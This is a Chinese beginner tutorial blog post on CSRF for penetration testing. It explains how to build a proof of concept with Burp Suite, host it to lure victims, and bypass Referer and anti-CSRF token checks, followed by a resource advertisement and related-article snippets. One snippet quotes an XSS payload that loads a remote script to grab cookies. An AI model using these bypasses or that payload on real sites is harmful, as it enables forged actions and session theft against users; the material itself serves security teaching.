【网络安全】渗透测试零基础入门之CSRF请求伪造技术详解,多种案例带你搞懂CSRF漏洞原理

原创 于 2025-09-11 14:20:58 发布 · 424 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #csrf #网络安全 #渗透测试 #计算机 #黑客技术 #编程

今天给大家分享一下网络安全渗透测试入门阶段文件CSRF漏洞概述和原理教程

本文主要讲解CSRF请求伪造&Referer同源&置空&配合XSS&Token值校验&复用删除。

喜欢的朋友们,记得给我点赞支持和收藏一下,关注我,学习黑客技术。

CSRF-无检测防护-检测&生成&利用

检测:黑盒手工利用测试,白盒看代码检验(有无token,来源检验等)

生成:BurpSuite->Engagement tools->Generate CSRF Poc

但是这不是我们想要的,我们想要的效果就是受害者一访问就会自动触发,还需要在修改下POC数据包

利用:将文件放到自己的站点下,诱使受害者访问(或配合XSS触发访问)

CSRF-Referer同源-代码逻辑&上传&XSS

https://blog.youkuaiyun.com/weixin_50464560/article/details/120581841

就是判断Referer这个值是不是同一个域名或者同一个源下

绕过也简单,把referer来源改下就行

但是这里又有个问题,就是受害者不可能自己去改referer这个值呀。
只能尝试一下下面三种方式绕过

绕过1:配合文件上传绕过
绕过2:配合存储XSS绕过
绕过3:去掉检测来源头(代码逻辑问题)

这是开发为了防止浏览器打开新窗口访问URL从而导致没有来源这个头部信息特意写的

CSRF-Token校验-值删除&复用&留空

token(令牌,也可以理解为暗号,在数据传输之前,要先进行暗号的核对,暗号不一致则拒绝数据传输)

CSRF_token 对关键操作增加Token参数,token必须随机,每次都不一样,存储在cookie中,与验证码一样

绕过:
绕过0:将Token参数值复用(代码逻辑不严谨)能够重复使用token
绕过1:将Token参数删除(代码逻辑不严谨)把token整个参数值删掉

绕过2:将Token参数值置空(代码逻辑不严谨)把token的值删掉,保留token=

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

在这里插入图片描述
在这里插入图片描述

网络安全CSRF与XSS攻击及其防护措施详解
03-17
内容概要:本文主要介绍了两种重要的网络攻击手段——CSRF(跨站请求伪造)和XSS(跨站脚本攻击)。首先阐述了CSRF的定义、形成机制以及防范办法,其中包括设置Cookie属性SameSite值为严苛级别或者验证来源请求头部...
PHP伪造referer实例代码
10-30
伪造referer实例代码,主要用于一些突破防盗链
WEB漏洞测试(三)——CSRF结合XSS攻击
qq_28241149的博客
03-04 2378
一.CSRF攻击 首先我们来看下什么叫做CSRF攻击,CSRF是一种伪造请求访问网站的方式,我们都知道B/S架构是基于HTTP请求完成前后端的通讯的,假设我其实不是真正的网站前端而伪造请求进行访问后台,就会产生一定的危险。 举例说,假设我登录A网站购买某产品,但是B网站伪造A网站购买产品的请求去访问A网站的后台接口,这就是一种CSRF的攻击了。 那么问题来了,B网站实际上并没有登
WEB攻防-CSRF请求伪造&Referer同源&置空&配合XSS&Token值校验&复用删除
SuperherRo的博客
09-13 1038
1、CSRF-原理&检测&利用&防御 2、CSRF-防御-Referer策略隐患 3、CSRF-防御-Token校验策略隐患
CSRF请求伪造&Referer同源&置空&配合XSS&Token值校验&复用删除
m0_70535581的博客
07-10 1886
CSRF请求伪造&Referer同源&置空&配合XSS&Token值校验&复用删除
CSRF简单理解---HTTP Referer字段验证(Java实现)
热门推荐
澪月
02-08 1万+
CSRF攻击简单来说就是: 1.你可以通过A网站发送请求“转100块给小明”。 2.然后你碰巧又上了X网站,X的某链接藏着一条操作”转100快给小芳”。 3.当你点击X网站的某个链接时,会利用你在A网站的session信息,发送请求”转100快给小芳”。 所以CSRF防御的重点就是怎么判断发送请求的是不是原网站。 referer的验证原理简单来说就是: 比对HTTP请求发送的网站(re...
Day56:WEB攻防-CSRF请求伪造&Referer同源&置空&配合XSS&Token值校验&复用删除
qq_61553520的博客
03-30 1145
小迪安全-Day56:WEB攻防-CSRF请求伪造&Referer同源&置空&配合XSS&Token值校验&复用删除
「 典型安全漏洞系列 」03.跨站请求伪造CSRF详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-14 2379
CSRF 攻击通过在用户不知情的情况下,冒充用户身份向服务器发送请求。由于攻击者可以利用用户在站点上已存在的 cookie 进行身份验证,所以这种攻击往往不易被察觉。它与常见的 XSS(跨站脚本攻击)攻击有相似之处,都是利用 Web 应用程序的安全漏洞进行攻击。CSRF常年位于CWE Top10,可见其危害性及普遍性。排名源自CWE官网Note:如果想了解CWE,请参阅「 网络安全常用术语解读 」通用缺陷枚举CWE详解
CSRF(跨站请求伪造漏洞介绍
weixin_56233402的博客
07-28 1224
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个攻击就完成了。所以CSRF攻击也成为"one click"攻击。很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。
csrf跨站请求伪造详解
m0_69962105的博客
11-24 1405
钓鱼网站搭建一个类似正规网站的页面用户点击网站链接,给某个用户打钱打钱的操作确确实实提交给了中国银行的系统,用户的钱也确实减少但是唯一不同的是,账户打钱的账户不是用户想要打钱的目标账户,变成了其他用户内部本质在钓鱼网站的页面针对对方账户,只给用户提供一个没有name属性的普通input框然后在内部隐藏一个已经写好有name属性的input框如何避免上面的问题csrf跨域请求伪造校验网站在给用户返回一个具有提交数据功能的页面的时候会给这个页面加一个唯一标识。
网络安全学习》 第九部分----CSRF(跨站请求伪造漏洞详解
tomatocc的博客
08-28 544
跨站请求伪造(也称为XSRF,CSRF和跨站点参考伪造)通过利用站点对用户的信任来工作。站点任务通常链接到特定URL(例如:http://site/stocks?buy = 100&stock = ebay),允许在请求时执行特定操作。如果用户登录到站点并且攻击者欺骗他们的浏览器向这些任务URL之一发出请求,则执行任务并以登录用户身份登录。通常,攻击者会将恶意HTML或JavaScript代码嵌...
一次csrf配合xss的攻击实例
aiquan9342的博客
03-16 449
xss出现在我的邮箱处 alert of payload "><script>alert(/test/)</script><" by cookie of payload "><script src=http://t.cn/RxQ4lz8></script><" csrf依旧是出现在“我的...
CSRF-跨站请求伪造
AmyBaby00的博客
02-22 582
SCRF :跨站请求伪造 指攻击者盗用了你的身份,以你的名义发送恶意请求。 包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账… CSRF目的: 修改用户名资料、账户密码,创建账户,自动发帖、点赞、评论等 SCRF原理: 浏览器在访问URL的时候会自cookie,基于这个特性,我们可自行编写表单,诱骗用户访问, 当用户访问我们自己提交的表单的时候,表单就会自动提交,如果服...
django中csrf token的验证原理
weixin_44670861的博客
12-02 571
1.django是怎么验证csrfmiddlewaretoken合法性的? 2.每次刷新页面的时候中的csrf的value都会更新,每次重复登录的时候cookie的csrf令牌都会刷新,那么这两个csrf-token有什么区别 CSRF简称跨站请求伪造 django第一次响应来自某个客户端的请求时,会在服务器端随机生成一个token,把这个token放在cookie里,然后每次POST请求都会上...
CSRF 请求伪造&Referer 同源&置空&配合 XSS&Token 值校验&复用删除
最新发布
2302_80396242的博客
04-19 514
利用:将文件防止自己的站点下,诱使受害者访问(或配合。可以添加目标网站作为目录 然后·新建个html文件。检测:黑盒手工利用测试,白盒看代码检验(有无。利用(那数据包怎么整 找相似源码自己搭建整)逻辑判断隐患 就是数据包没有浏览器来源这行。匹配对比要求点击进来的而不是直接访问。
CSRF - 空Referer绕过
weixin_34024034的博客
11-19 328
在实际环境中,服务器很多CGI由于一些历史原因,必须允许空Referer的请求。比如:老的客户端版本请求的时候就没有Referer,总不能在服务端一刀切,让老版本的用户都无法正常使用了吧。 这样的CGI就存在CSRF攻击的风险。那么我们该如何在真实环境中构造一个可利用的POC呢? 我们知道正常的页面跳转,浏览器都会自动上Referer,那么现在的问题就变成了什么情况下浏览器会不Refere...
伪造referer [极客大挑战 2019]Http1
m0_75178803的博客
11-10 566
打开题目没有发现什么,我们查看源代码在这里我们发现了提示访问一下页面得到提示说不能来自于https://Sycsecret.buuoj.cn,我们尝试访问一下这个url发现访问不了我们bp抓包一下伪造个referer头发包过去看看发现页面又说要用Syclover所以又要伪造浏览器发包过去,发现页面又要本地ip才能访问我们伪造本地ip地址发包过去得到flag同样的道理例题见:墨者学院 浏览器信息伪造打开题目点开才发现网页只有在IPhone手机的2g网络下才能查看。
CSRF漏洞
woo233的博客
08-03 307
跨站请求伪造(Cross-Site Request Forgery)实现流程:在登录服务器时,有访问了第三方的网站,第三方网站中有恶意代码(发起对目标服务器的端口的调用)的网页,浏览器执行了其中的代码。
CSRF 原理与防御案例分析
weixin_43639741的博客
04-22 891
CSRF,也称 XSRF,即跨站请求伪造攻击,与 XSS 相似,但与 XSS 相比更难防范,是一种广泛存在于网站中的安全漏洞,经常与 XSS 一起配合攻击。 CSRF 原理 攻击者通过盗用用户身份悄悄发送一个请求,或执行某些恶意操作。 CSRF 漏洞产生的主要原因: 1、请求所有的参数均可确定 2、请求的审核不严格,如:只验证了 Cookie 关于 CSRF 的执行过程,这里引用自 hyddd 大...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值